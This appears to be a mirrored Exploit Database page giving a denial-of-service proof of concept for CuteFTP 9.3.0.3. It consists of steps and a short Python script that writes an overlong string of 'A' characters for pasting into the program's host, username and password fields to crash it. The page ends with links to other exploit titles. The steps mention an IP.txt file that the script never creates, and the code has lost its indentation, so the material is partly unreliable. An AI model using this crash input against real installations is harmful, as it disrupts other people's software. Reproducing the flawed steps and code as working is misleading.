CuteFTP 9.3.0.3 – Denial of Service (PoC)

Exploit Database
108 阅读

作者： Ismael Nava

日期： 2018-11-12
类别：
- dos
平台：
- windows_x86-64
来源：https://www.exploit-db.com/exploits/45814/

# Exploit Title: CuteFTP 9.3.0.3 - Denial of Service (PoC)
# Date: 2018-11-05
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.globalscape.com/cuteftp
# Software Link: https://www.globalscape.com/cuteftp
# Version: 9.3.0.3
# Tested on: Windows 10 Home x64
# CVE : n/a

# STEPS
# Run the python exploit script, it will create a new .txt files
# Open the program CuteFTP
# Copy the content of the file "Cute.txt"
# Paste the content in the fields Host, Username and Password
# In the field "Hostname or IP" paste the content of the file "IP.txt"
# Click in Connect
# End :)

buffer = 'A' * 1000

try: 
file = open("Cute.txt","w")
file.write(buffer)
file.close()

print("Archive ready")
except:
print("Archive no ready")

last Exploits
CuteFTP 9.3.0.3 – Denial of Service (PoC)的更多信息

NJStar Communicator MiniSmtp – Buffer Overflow (ASLR Bypass)：
Apple macOS/iOS – Multiple Kernel Use-After-Frees due to Incorrect IOKit Object Lifetime Management in IOTimeSyncClockManagerUserClient：
Avira – Heap Underflow Parsing PE Section Headers：
Mozilla Spidermonkey – Unboxed Objects Uninitialized Memory Access：
ZipItFast 3.0 – ‘.zip’ Heap Overflow：
XnView – ‘.FlashPix’ Image Processing Heap Overflow：
Microsoft Font Subsetting – DLL Heap Corruption in FixSbitSubTables：
TapinRadio 2.11.6 – ‘Uername’ Denial of Service (PoC)：